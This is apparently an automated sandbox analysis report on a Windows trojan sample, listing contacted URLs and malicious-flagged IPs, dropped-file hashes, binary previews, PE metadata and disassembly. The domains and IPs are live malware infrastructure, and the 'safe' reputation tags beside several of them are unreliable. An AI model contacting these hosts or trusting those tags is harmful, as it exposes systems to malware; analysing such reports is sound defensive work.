                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.checkout4xgrow.shop/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ujgddhhfeffsfgg2.groupReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.topallinoneaccounting.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.zu89.topexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.momura.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.00050516.xyz/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://android.notify.windows.com/iOSJMexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://outlook.comexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.modleavedepts.onlineReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.babyscan.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://android.notify.windows.com/iOSZMexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.zu89.top/ts59/explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.bvlazaedi.xyz/ts59/www.babyscan.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.yelp.comexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.76466.club/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.bvlazaedi.xyz/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.momura.xyzReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.76466.clubexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.babyscan.xyz/ts59/www.gb-electric-wheelchairs-8j.bondexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kgstrengthandperformance.com/ts59/www.bvlazaedi.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ec-delivery-jobs-8j.bond/ts59/www.zu89.topexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.checkout4xgrow.shop/ts59/www.kgstrengthandperformance.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.microexplorer.exe, 00000003.00000000.1438329693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1437589686.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3877014382.0000000002C60000.00000002.00000001.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.00050516.xyzReferer:explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                             IP:194.41.37.158
                                             Domain:gt.huhusddfnsuegcdn.com
                                             Country:unknown
                                             ASN:133199
                                             ASN Name:SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK
                                             Malicious:true

                                             IP:185.53.179.91
                                             Domain:www.gb-electric-wheelchairs-8j.bond
                                             Country:Germany
                                             ASN:61969
                                             ASN Name:TEAMINTERNET-ASDE
                                             Malicious:true

                                             IP:188.114.97.3
                                             Domain:www.checkout4xgrow.shop
                                             Country:European Union
                                             ASN:13335
                                             ASN Name:CLOUDFLARENETUS
                                             Malicious:true

                                             IP:76.223.105.230
                                             Domain:kgstrengthandperformance.com
                                             Country:United States
                                             ASN:16509
                                             ASN Name:AMAZON-02US
                                             Malicious:true

                                             IP:3.64.163.50
                                             Domain:www.babyscan.xyz
                                             Country:United States
                                             ASN:16509
                                             ASN Name:AMAZON-02US
                                             Malicious:true
                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1467059
                                            Start date and time:2024-07-03 17:24:14 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 11m 41s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                             Number of new started processes analysed:9
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Sample name:MKCC-MEC-RFQ-115-2024.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@8/4@12/5
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 59
                                            • Number of non-executed functions: 277
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                             • Not all processes were analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: MKCC-MEC-RFQ-115-2024.exe
                                             Time:11:25:26
                                             Type:API Interceptor
                                             Description:7991644x Sleep call for process: explorer.exe modified

                                             Time:11:26:00
                                             Type:API Interceptor
                                             Description:7280128x Sleep call for process: systray.exe modified
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):184920
                                            Entropy (8bit):7.982904590777022
                                            Encrypted:false
                                            SSDEEP:3072:lezSjGBTPXRWzKdFQLiKCjEQMFq3zHncy7CxTKXeUkksrEscU2bHi8z:bEnaL8EQCqrDcT/UKrYU6i4
                                            MD5:BFC95972013A80FB99151758B818D8F4
                                            SHA1:310E1130E3743D97FCE8F805536D59FF5B834634
                                            SHA-256:4EBF76DA2837D8FBA4CFD1D38A48AD1FAB09D5E8A66FAB83EC31F74678F09C16
                                            SHA-512:CC9DD648EE0E6621A2C07C7272218D52FD892621B8AEB66C2C8F3A282B1F3B397B588C6BC46C8EAB4D4C0A1CF2310BD704651A7FD04A6475F618BAC4EA693FA0
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9868
                                            Entropy (8bit):7.602758961594377
                                            Encrypted:false
                                            SSDEEP:192:65jwEiqQ9pW+hCZcbZ/wzJkecGgL98GtgFhPfOeRmb8vMDdfVVZ:I6qy2ZcbZ/YeecGgLKhPmeSaMDdfVVZ
                                            MD5:DFA9477F872A32EF14B38DAF92236F43
                                            SHA1:7B10809B3D4384AA587008BE459B5B5735CDCA74
                                            SHA-256:49DA1C10EDC100D99C81949C783C8CC14DFA849288DB8A99D77CBD85BBCA0E39
                                            SHA-512:6E4D42E53A054A4970084CC8EF1EC16E17208FB8C254AD0289A9620E253465E52A4AA63000BEA7691D28E4A7B9E331D600B8D18C4EFB6028FB8CB2FD65A79D96
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):189440
                                            Entropy (8bit):7.884262324820212
                                            Encrypted:false
                                            SSDEEP:3072:hz3aITDLGnW/DWoV6QJP6Wl9vIPt2LQJ9d4t0nIshnvRUoj8CLm1P2:tKIX6W/DC2PNbta9d4aXnvRUowTY
                                            MD5:2FC699C00FA4977FA1676EE76FC3F601
                                            SHA1:44734011C3C676CBA771C365529C1C5407BAA175
                                            SHA-256:E67E23BB7D9C9702AC1F53ED89B5A26A260EEF369E8EC20C5FDE0D57BEF9100B
                                            SHA-512:691AF8B06343C21563648AFC265C73E5F3C20F0319CD435C6BC0ED464DDE01E53E27C1FC4DFA0170E5085D99D72135C119D74891CA508A630057C5BAC6CB36A4
                                            Malicious:false
                                            Reputation:low
                                            Preview:zj.f.LEGP...L..e.5B....W<...GPX9JEIWJNYK5AI270T4CLEGPX9JEI.JNYE*.G2.9...M..q.Q#6i'8!>9T,iQV^:[7l'"p*L$e 9j....,&VR.Y9IhEGPX9JE.B...S...Q...%..G...#.J..'..7....*..9;Q../.JNYK5AI270T4CLEG..9J.HVJ.2}{AI270T4C.EEQS8@EI.HNYK5AI270..BLEWPX9.GIWJ.YK%AI250T1CMEGPX9OEHWJNYK5.K272T4CLEGRXy.EIGJNIK5AI"70D4CLEGPH9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T.7)=3PX9..KWJ^YK5.K27 T4CLEGPX9JEIWJnYKUAI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:ASCII text, with very long lines (28756), with no line terminators
                                            Category:dropped
                                            Size (bytes):28756
                                            Entropy (8bit):3.594828848310999
                                            Encrypted:false
                                            SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+Iw6lr4vfF3if6gyTx:miTZ+2QoioGRk6ZklputwjpjBkCiw2RE
                                            MD5:4532E37EF43D75CDE8566E9D071F404A
                                            SHA1:6517B75EE1958591407A32787034C01E3DE35381
                                            SHA-256:824BAA334FBC2C6B3304E1B2A357F7F276ECE1CB6AE649AF2BF7D9011BF2C6E8
                                            SHA-512:6D98788D604286BA27F0FAB7F4E35A7B7278AA89779C15FA1F8573F4C5DE15E9B763B4DCDA906A1E416604EAB2078271EBCFA309A4773CCC1367F95E2CDC2648
                                            Malicious:false
                                            Reputation:low
                                             Preview:
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.004154714013012
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:MKCC-MEC-RFQ-115-2024.exe
                                            File size:1'081'856 bytes
                                            MD5:11ab7d8a50ccafbb4d7b5c9e83e4ff4c
                                            SHA1:1e0d2f0564e8a8dc7237c98e3facc0e1b4b314cf
                                            SHA256:2eb137991ea1e48556d906d1e03bfaed1df13529dd2420031e6fc92b55c076d1
                                            SHA512:2e03c60963526576b3a75a488adb607d148888caa4a9be2177479ab762576082e5af2a7a8fd30e019c782dba36dfddc2b1a31c9f36d95bbbbc27a233a2610995
                                            SSDEEP:24576:PAHnh+eWsN3skA4RV1Hom2KXMmHat0nexrhALk5:yh+ZkldoPK8YateEt
                                            TLSH:F835AD0273D1C036FFABA2739B6AF60596BD79254123852F13981DB9BD701B2233D663
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                            Icon Hash:aaf3e3e3938382a0
                                            Entrypoint:0x42800a
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66852A87 [Wed Jul 3 10:40:07 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                            Instruction
                                            call 00007F98B8E57CFDh
                                            jmp 00007F98B8E4AAB4h
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push edi
                                            push esi
                                            mov esi, dword ptr [esp+10h]
                                            mov ecx, dword ptr [esp+14h]
                                            mov edi, dword ptr [esp+0Ch]
                                            mov eax, ecx
                                            mov edx, ecx
                                            add eax, esi
                                            cmp edi, esi
                                            jbe 00007F98B8E4AC3Ah
                                            cmp edi, eax
                                            jc 00007F98B8E4AF9Eh
                                            bt dword ptr [004C41FCh], 01h
                                            jnc 00007F98B8E4AC39h
                                            rep movsb
                                            jmp 00007F98B8E4AF4Ch
                                            cmp ecx, 00000080h
                                            jc 00007F98B8E4AE04h
                                            mov eax, edi
                                            xor eax, esi
                                            test eax, 0000000Fh
                                            jne 00007F98B8E4AC40h
                                            bt dword ptr [004BF324h], 01h
                                            jc 00007F98B8E4B110h
                                            bt dword ptr [004C41FCh], 00000000h
                                            jnc 00007F98B8E4ADDDh
                                            test edi, 00000003h
                                            jne 00007F98B8E4ADEEh
                                            test esi, 00000003h
                                            jne 00007F98B8E4ADCDh
                                            bt edi, 02h
                                            jnc 00007F98B8E4AC3Fh
                                            mov eax, dword ptr [esi]
                                            sub ecx, 04h
                                            lea esi, dword ptr [esi+04h]
                                            mov dword ptr [edi], eax
                                            lea edi, dword ptr [edi+04h]
                                            bt edi, 03h
                                            jnc 00007F98B8E4AC43h
                                            movq xmm1, qword ptr [esi]
                                            sub ecx, 08h
                                            lea esi, dword ptr [esi+08h]
                                            movq qword ptr [edi], xmm1
                                            lea edi, dword ptr [edi+08h]
                                            test esi, 00000007h
                                            je 00007F98B8E4AC95h
                                            bt esi, 03h
                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [ C ] VS2013 build 21005
                                            • [C++] VS2013 build 21005
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [ASM] VS2013 UPD5 build 40629
                                            • [RES] VS2013 build 21005
                                            • [LNK] VS2013 UPD5 build 40629
                                             Name                                 | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xbc0cc         | 0x17c        | .rdata
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xc8000         | 0x3db5c      | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
